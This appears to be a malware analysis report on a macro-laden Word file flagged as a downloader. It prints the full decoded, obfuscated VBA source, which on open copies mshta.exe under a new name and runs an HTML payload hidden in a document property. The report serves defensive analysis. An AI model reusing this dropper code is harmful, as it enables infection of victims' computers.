MALICIOUS
138
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is an OOXML document containing VBA macros, including an AutoOpen subroutine, which is a common technique for malicious documents. The critical ClamAV heuristic indicates a known downloader pattern. The VBA code, though partially obfuscated, likely attempts to download and execute a second-stage payload, aligning with the Ingress Tool Transfer (T1105) technique. The presence of VBA macros points to the Visual Basic (T1059.005) technique, and the overall nature suggests it was delivered as a Spearphishing Attachment (T1566.001).
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + aag37 + "ell").run(aGpXN) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
awZxb = Environ(aZzKR0) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12909 bytes |
SHA-256: 1f19793e62620401538e24d63037ea8503082a42b93f6affadf091570299e4f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aOsMR"
Sub AutoOpen()
a38lTw
End Sub
Attribute VB_Name = "aYWcD"
Public Const abCVA As String = ""
Public Const a7uhz As Integer = 24206 / 1862
Public Const aLjAkD As String = "1ridn1iw1"
Public Const aFuXMk As String = "231met1sys1"
Public Const apCUd As String = "p1m1e1t"
Public Const aag37 As String = "cript.sh"
Function a6zCrJ()
End Function
Sub aYqFhV(aD7hB)
' Whether twenty-second shapes inkjet
' Names slideshow potentate break dryness ga
' Specify irrigation
' Romania medusa speech
' Twaddle essayist duval
' Itinerary abating
' Wondering early
' Kashmir collectables venerated relevant initiated veterinary allowing fleming
' Linguist thriller saturn taurus participating ostentatious his
' Collective any filing wield
' Nominative qv chattel
' Ruffle impaled testament lucifer bard asian
' Deprivation rankings wet deer arm agreement
' Portent sprinkle personification
' Berkeley scholar collins cob hysteria
' Versatility buildings lt autos usable paxil
' Roll malpractice
' Tourist budge
' Blazoned nylon proven cornfield suffer puerto
' Qualify immobility laggard
' Tasks slovakia enigma instigation
' Ottawa assumed gloves sooty israel carbide
' Thats austria waiting
' Illustration probably permitted accessing embassy carol
' Thirty-three chart emission windsor
End Sub
Function aT6b2R(a1HDNc)
' Scored fishing
' Ammonia who major mountebank hangman
' Compunction
' Towel swimming retracted
' Riddled absolve vim
' Marker relent
' Pine squeal
' Modem iran whilst evenly statements lassie
' Little job centralization low egypt
' Blowing baptist res amicably
aT6b2R = ActiveDocument.BuiltInDocumentProperties(a1HDNc)
End Function
Public Sub aKBtk()
' Ovary burton
' Ne bobby
' Flood robbie
' Pc purl evolve
' Comer slug
' Instigator skim
' Inquisitively beastiality pool temple fag popish
' Detention upheaval published tell
' Ht repel proportion threadbare
' Steadfastness detected crunch broker tripadvisor
' Associates arrived dictation waxing adventuress median
aWbD3t
End Sub
Public Sub a1qHCi()
' Rhythmic specifying accountability psychology woolly
' Bored reveals
' Tangent tempo masturbation
' Tube swap
' Doughty bowling
' Durham clive
' Cisco incipient
' Dubious pasta refined inline suffocation culminated
' Scientists semiconductor oracle abdullah campus
' Reads
' Omnipotence aground pear bearing
axJec
End Sub
Attribute VB_Name = "aP6Iq"
Public Function aLCAK(awDfpM, an5JC)
' Strategies trepidation signed naive custom
' Radio
' Invisible
' Nothing concupiscence coaching
' Versed spike gossip
' Roan construe
' Cooking witticism florence bible adopt lack
' Happened count purging
' Avoidance ye
' Bishop prim managers av
' Touring gmbh throwing caucus
' Hops detest tillage thunderbolts
' Markets burlington rabbit iambic separates
' Code dragon
' Replete dictator consolidated oceans
' Portuguese expostulation aims specified alcove
' Graph refuse trust crest
' Resistant hi console
' Ya scapegrace thickness around system temporarily apache knack
' Erudite
' Stephanie worshiped fraternity holocaust
' Claret martha agone tributaries
' Field stew expressions
' Fairy -a madness
' Sons overseas prevention
FileNumber = FreeFile
Open awDfpM For Output As #FileNumber
' Lotus drawn psychic
' Aqua cartoon obsession medications politic
' Armature rewards bear
' Selecting transsexual
' Listening lecturer
' Fiasco collects suave fie
' Pyjamas ewe
' Cropping dowry lukewarm indubitable
' Va. calibration
' Nationalism decorous grape
' Petrol bachelor
Print #FileNumber, an5JC
Close #FileNumber
End Function
Sub ablye0(aQWEjn, azLjAf)
' Seaboard
' Outstrip ent aw hop corporate
' Fertilizing threshing franc gust perplexing glasgow lighter
' Spaulding rotary sexual
' Augmentation
' Boorish grounded
' Albany lindsay flog chide imperfection
' Broken-down excitation
' Gaoler invocation mercedes mythological dm
' Draper recommended collecting
' Prevent canada exempt thane
' Sept
' Gulf enrollment innermost outcomes
' Unpremeditated constitutes andorra
' Frightening dollars butterfly liable
' Possibility forge forum instructional
' Nude algebra waylay variations
' Diane brevity
' Alluring interspersed foam
' Championship assailant
' Brought leaky methods
' Coupons pyramidal bones usurer paroxysm eligible
FileCopy aQWEjn, azLjAf
End Sub
Function aT57n(apcU5)
' Reconstruction torpedo
' Chronicles
' Fragrance peaceful
' Psp dpi crane patrick assist
' Hierarchy highway laundry joey
' Send breakdown operations broke
' Jumps bayou
' Imperil schooling hudson precious midi
' Parasite screening hilton refrigerator lets
' Loth
aT57n = apcU5
End Function
Function auZiER(apcU5) As String
Dim a4zqkg As Long
Dim ay5Gb As Integer
Dim a9yYUQ As Integer
For a4zqkg = 1 To Len(apcU5)
a9yYUQ = 0
' Efficient pads
' Compilation courier tennis
' Nine collecting mobiles ostracism studying
' Draper tile hybrid drawbridge
' Anchorage
' Complexity lowest past deleted obstruct coding academy
' Disks
' Olympic grieves dogs trespass
' Rn learners
' Syndication exasperate bastard
aLvurb = Mid(apcU5, a4zqkg, 1)
' Cashier
' Ll priceless thunderbolt elegiac fundamentals
' Orbit enlistment riga bravo
' Editing platforms utilities franc advises listed
' Peer torpedo
' Farmer could clipping ooze cam
' Patricia watching yang pf
' Dipper neath sticky activists probity tyler introspection
' Sc limousine
' Raises diagram prate
ay5Gb = Asc(aLvurb)
If (ay5Gb > azKXq(22638 / 22638) And ay5Gb < azKXq(12024 - 12022)) Or (ay5Gb > azKXq(10467 - 10464) And ay5Gb < azKXq(2600 / 650)) Then
a9yYUQ = a7uhz
' Represent madeline
' Changes shortcuts twitching
' Florid poet
' Wav diane budapest
' Cashier specifics living
' Bloated unemployment delectable oceans
' Shatter earth relatively gently chronic appurtenances vestibule
' Slam householder
' Dilute trips pranks subjugate
' Clocks programmes beech dates
ay5Gb = aEBQMD(ay5Gb, a9yYUQ)
If ay5Gb < azKXq(5) And ay5Gb > 83 Then
ay5Gb = aUal71(ay5Gb)
ElseIf ay5Gb < -68 + 133 Then
ay5Gb = aUal71(ay5Gb)
End If
End If
' Economy stupid itd phrygian boulder handjob
' Air prep
' Interlocutor tuscany actually
' Tracking yours concise naples springer superstructure
' Elsewhere printers fortify
' Suse mothers latest
' Dowdy zoning answered harangue
' Working sobriety dictionaries msie parent unlikely
' Sinuous dominoes modelling refers miniature
' Mandatory hankering syndrome options slavonic
' Experiments cartilage insecurity cant
aBwRl = aqAVXi(ay5Gb)
' Logistics fern bobby evaluating spans revert
' Generous
' Triple sin handheld
' Gushing despotic bacon catalog purse
' Itself pregnant alchemists reprint necessary
' Yesterday specialized modes
' Maori reforms analyses
' Sword peninsula republicans radius
' Torpor senator young
' Lavender signs
Mid$(apcU5, a4zqkg, 1) = aT57n(aBwRl)
Next a4zqkg
auZiER = apcU5
End Function
Attribute VB_Name = "aMs78h"
Function aAjhV(a2FW9d)
' Effusion adolf overall cauliflower
a0MjFb = a2FW9d
aud2Ke = Len(a0MjFb)
For a90OU1 = 0 To aud2Ke - 1
' Vexatious harassment minnesota queens
' Mistrust transactions endow theoretic repudiation
' Switches demarcation
' Tackle
' Piracy sanitation
' Crux designated
' Keyboard indexes
' Fiber handjob
' Piano ashy carey writs media
' Beck hey male mls
' Boxing
' Libertine
awWdQ = awWdQ & Mid(a0MjFb, (aud2Ke - a90OU1), 1)
Next a90OU1
' Cession unchallenged
aAjhV = awWdQ
End Function
Public Function at5JpN(a2iRk)
' Dd up impost taylor
' Chime
' Tables dazzle emoluments thesis miss
' Anvil usually capitulation
' Laboratories sepulture
' Oak pedantic monty infidel
' Effrontery watchfulness
' Christopher unpaid thirty-three
' Texts
' Ascendancy incompetent scorching assessment
' Changing mown
at5JpN = Replace(a2iRk, abCVA, "")
' Johnston ranges danish jade
End Function
Sub a38lTw()
' Egotistical gained cretaceous marc
' Detestation stile chip
' Simulated egypt sop
' Impair neptune butchers vivacious fated
' Mar titans cramp latch impeachment eau easel
' Hops
' Stamps indite quilt
' Thehun chaos extract setting bullying
' Weekend chaotic election defend impacts median wicker impaled
' Volleyball mcdonald outspoken lurk abbreviations
' Told
aKBtk
a1qHCi
' Years
' Stack
' Sheep bone rime
' Helpfulness duchy bicycles
' Since unto columnists platinum baskets
' Chamois chicks modena
' Border safe-conduct suggest expiration ot
' Ismail meat delia
' Petroleum bribery re
' Enb treated jo. electronic
' Circuitous copper lolita frivolity tertiary
Call CreateObject("ws" + aag37 + "ell").run(aGpXN)
End Sub
Attribute VB_Name = "aNkXtr"
Function awZxb(aZzKR0)
awZxb = Environ(aZzKR0)
End Function
Function aLrOE()
' Opt mba skype
With Application
aLrOE = .PathSeparator
End With
End Function
Function aYiGET(avRtwQ)
aN5zS = VBA.Split(aAjhV("lmth.ni|moc.ni|exe.athsm"), "|")
Select Case avRtwQ
' Society understand dagon droll joyce
' Passenger support compete
' Equatorial pearl adolescence sextant
' Tuberculosis devious gp
' Disciplined somerset adherence
' Casio inc. ide principality prostores
' Plebeian fantasy sprinkle sty
' Alkali involve lace installing
' Besides murder
' Valley hew topaz
' Ea jewelry
' Oman control
' Remain completed philippines newman blithe
' Meter statuary ventricle
' Vermilion rugby
' Medieval discs spalding lessons openings
' Quicken
' Subservient km tram illustrations
' Emissary hubbub ultra apples debut
' Clown ac removed
' Turkey irish
' Dowry self-made give vastness presentiment elevate
Case 0:
aYiGET = awZxb(Replace(aAjhV(aLjAkD), "1", "")) & aLrOE & Replace(aAjhV(aFuXMk), "1", "") & aLrOE & aN5zS(0)
' Ips inspired marco sunday
' Adidas ps.
' Puts animal governments kinswoman
' Zodiac automatically
' Three-quarter rationally
' Funky
' Sequence fp quail
' Sperm
' Shoemaker
' Liqueur parliamentary divide halloween loin
Case 1:
aYiGET = awZxb(Replace(aAjhV(apCUd), "1", "")) & aLrOE & aN5zS(1)
Case 2:
aYiGET = awZxb(Replace(aAjhV(apCUd), "1", "")) & aLrOE & aN5zS(2)
End Select
End Function
Sub axJec()
ab4TI = acrEBb(aYiGET(2))
aLCAK ab4TI, auZiER(aT6b2R("category"))
End Sub
Attribute VB_Name = "aLhw9q"
Function aYyAr3(aOvSh)
' Asks genealogy
' Card uncontrolled methodology prevalence
' Restitution oil winsome twins
' Waitress neapolitan
' Modelling ct
' Shade parliamentary thrace slut accepted avaricious
' Photography potash
' Ringtones preceding
' Joker microwave fallacy typewriter educator
' Su counterfeit sixty-six
' Posting tinkling metres surname
aYyAr3 = (at5JpN(aOvSh))
End Function
Function ag3SWB(aVj1Z)
' Was noon factors
' 404 canary
' Flat
' Collie rarity pierre southwest
' String gunwale asthma gruesome
' Touring zechariah cvs indicators
' Effeminate smoker sharpen
' Watching routes poster lizard plaza homesickness
' Fears street equanimity cup conflagration order
' Milan pithy proven outlook diadem
ag3SWB = (at5JpN(aVj1Z))
End Function
Function acrEBb(aO4Y3P)
' Ailed dictation
' Doo cdt re- ultimately drunkard
' Originate meanwhile side roller kirk incipient
' Ti reputable neo
' Berkeley parish hog
' Nebula buckler
' Inflected weekends algorithms
' Savior
' Artificially fathers expel name
' Maniac
' Prompt jumping gent ea yacht kai
' Bikes temperatures cv dennis
' Exchange
' Sea algiers benign celerity monastic
' Tucson invective
' Heard profanation heavily
' May
' Bolting atkins portrayal repeat
' Lender r furnished rated swain oc mercenary
' Cravat greenery marble cornish rueful
' Convivial venture reticent
' Teller badge
acrEBb = (at5JpN(aO4Y3P))
End Function
Function aGpXN()
a2nJam = ag3SWB(aYiGET(1))
atBl8 = acrEBb(aYiGET(2))
aGpXN = a2nJam & " " & atBl8
End Function
Attribute VB_Name = "arzDo"
Sub aWbD3t()
aFec8 = aYyAr3(aYiGET(0))
aOMGW = ag3SWB(aYiGET(1))
ablye0 aFec8, aOMGW
End Sub
Function aUal71(a2Amxy)
aUal71 = a2Amxy + 2392 / 92
End Function
Function azKXq(a6Ev87)
If a6Ev87 = 0 Then
azKXq = -27712 + 27713
ElseIf a6Ev87 = 1 Then
azKXq = -105 + 169
ElseIf a6Ev87 = 2 Then
azKXq = 20657 / 227
ElseIf a6Ev87 = 3 Then
azKXq = 75 + 21
ElseIf a6Ev87 = 4 Then
azKXq = 326 - 203
ElseIf a6Ev87 = 5 Then
azKXq = 403 - 306
Else
azKXq = 1004 + 20
End If
End Function
Function aEBQMD(a2Amxy, aCfkPX)
aEBQMD = a2Amxy - aCfkPX
End Function
Function aqAVXi(a2Amxy)
aqAVXi = VBA.ChrW(a2Amxy)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 51712 bytes |
SHA-256: b40a12f1da85bed638a193fb095946d7a37c71865dccc3a0614e5ca4b50a2a3f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.